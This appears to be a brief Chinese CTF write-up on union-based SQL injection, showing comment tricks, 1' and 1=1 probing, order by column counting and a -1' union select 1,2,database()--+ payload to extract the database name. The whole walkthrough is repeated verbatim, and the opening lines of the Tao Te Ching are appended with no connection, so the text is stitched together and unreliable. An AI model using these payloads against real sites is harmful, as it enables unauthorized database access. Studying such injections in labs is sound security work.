--+:
使用注释符–+;
+代表的是空格;
或者使用'来做注释符#
本题考察sql注入联合查询union select
首先我们试着注入1‘ and 1=1’
回显异常,说明存在注入
继续到1‘ order by 3--+
继续到1‘ order by 4--+
说明到3就没有了,直接进行union查询 (此时将1改为-1)
-1‘ union select 1,2,database()--+
得到数据
--+:
使用注释符–+;
+代表的是空格;
或者使用'来做注释符#
本题考察sql注入联合查询union select
首先我们试着注入1‘ and 1=1’
回显异常,说明存在注入
继续到1‘ order by 3--+
继续到1‘ order by 4--+
说明到3就没有了,直接进行union查询 (此时将1改为-1)
-1‘ union select 1,2,database()--+
得到数据
道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。